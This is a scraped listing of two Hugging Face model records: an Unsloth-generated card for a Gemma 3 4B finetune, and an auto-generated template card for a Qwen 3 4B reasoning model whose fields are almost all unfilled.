0.13.2 - Transformers 4.46.0 - Pytorch 2.5.0+cu124 - Datasets 3.0.1 - Tokenizers 0.20.1
reesu/gemma-3-finetune
reesu
2025-05-30T07:07:12Z
4
0
transformers
[ "transformers", "safetensors", "gemma", "image-text-to-text", "text-generation-inference", "unsloth", "gemma3", "conversational", "en", "base_model:unsloth/gemma-3-4b-it-unsloth-bnb-4bit", "base_model:finetune:unsloth/gemma-3-4b-it-unsloth-bnb-4bit", "license:apache-2.0", "endpoints_compatible", "region:us" ]
image-text-to-text
2025-05-30T06:58:39Z
--- base_model: unsloth/gemma-3-4b-it-unsloth-bnb-4bit tags: - text-generation-inference - transformers - unsloth - gemma3 license: apache-2.0 language: - en --- # Uploaded finetuned model - **Developed by:** reesu - **License:** apache-2.0 - **Finetuned from model :** unsloth/gemma-3-4b-it-unsloth-bnb-4bit This gemma3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
KanManee/Qwen-3-4B-IncomeCode-Reasoning
KanManee
2025-05-30T07:01:03Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-05-30T07:00:46Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]